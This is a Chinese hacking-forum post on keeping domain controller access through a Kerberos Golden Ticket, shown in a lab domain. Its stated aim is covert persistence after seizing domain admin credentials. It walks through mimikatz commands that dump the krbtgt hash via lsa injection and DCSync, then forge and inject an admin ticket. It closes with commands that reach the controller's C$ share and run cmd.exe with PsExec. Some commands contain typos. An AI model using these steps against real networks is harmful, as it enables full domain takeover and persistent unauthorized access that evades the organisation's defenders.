电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2294 人浏览分享

域控权限维持(上)

[复制链接]
2294 0
域控权限维持(上)

​在我们取得域控账号密码后 防止密码被改失去权限会使用隐蔽后门一系列手段来维持我们取得的域控权限
把恶意文件放在Windows启动项目录中是最简单的方式 但是隐蔽性差 较主流的域控权限维持方法通常有
三种本篇讲第一种Golden Ticket。

Golden Ticket

​Golden Ticket 黄金票据黄金票据是伪造票据授予票据 TGT 也被称为认证票据。mimikatz
工具把Golden Ticket的这种特性称为 万能票据 。
​Krbtgt账号用来创建票据授予服务加密的密钥 该账号在创建域控制器时由系统自动创建 并且其密码随机分配Kerberos
黄金票据是有效的TGT Kerberos票据 因为它是由域Kerberos帐户 KRBTGT加密和签名的 。TGT仅用于向域控制器上的
KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

利用krbtgt用户和Hash伪造票据授予票据 TGT冒充任意用户身份无限制地访
问整个域中的机器且还可以提升为域管理员。
黄金票据的条件要求:
  1. 1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot]
  2. 2.域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value]
  3. 3.域的KRBTGT账户NTLM密码哈希
  4. 4.伪造用户名
复制代码

接下来 我们对Golden Ticket进行利用测试。这里域控制器为 Server 2008 R2 Sp1  192.168.239.138 dc.pen
testlab.com,域内主机为Server 2008 R2  192.168.239.133 zhangsan-pc.pentestlab.com。具体步骤如下。

1.域管理
  1. net group "domain admins" /domain
复制代码

查找域管理员执行效果如下

224904a3jua4y6waa2q4yq_看图王.png

2.域SID

​执行 whoami /user 命令 删除结果中SID的最后部分 获取域SID得到的效果如下 如果我们有
PsTools,那么也可以使用PsGetsid.exe获取SID。

999_看图王.png

3.NTLM Hash

获取krbtgt账户的NTLM Hash需要拥有访问域控制器的权限使用交互方式或远程方式登录域控制器后
使用mimikatz来提取krbtgt账户的NTLM Hash,命令如下:
  1. privilege::debug
  2. mimikatz # lsadump::1sa /inject /name:krbtgt
复制代码

或者
  1. mimikatz # 1sadump::dcsync /domain.pentestlab.com /user:krbtgt
复制代码

获取krbtgt账户信息执行效果如下。

998.jpg

4.Pass-the-Ticket攻击

​伪造Golden Ticket进行Pass-the-Ticket攻击 伪造项主要包括以下3个。
  1. 1.Domain:pentestlab.com
  2. 2.SID:S-1-5-21-2540170591-2917293557-2322194170
  3. 3.Hash:d1dd822b253f64cba7163e0509219d33
复制代码

生成需要模拟用户的票据。以模拟域管理admin用户为例,执行的命令如下:
  1. mimikatz # kerberos::golden /user:admin /domain:pentestlab.com /sid:S-1-5-21-2540170591-29
  2. 17293557-2322194170 /krbtgt:d1dd822b253f64cba7163e0509219d33 /admin:admin.tck /ptt
复制代码

生成admin用户的票据 执行效果如下。

997.jpg

5.验证成功

​测试获得的域管理权限相关命令如下:
  1. dir \\dc.pentestlab.com\c$
  2. P**ec.exe \\dc.pentestlab.com\ cmd.exe
复制代码

访问C盘目录文件 执行效果分别如下。

996.jpg

以域管理权限执行cmd.exe 执行效果分别如下。

992_看图王.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.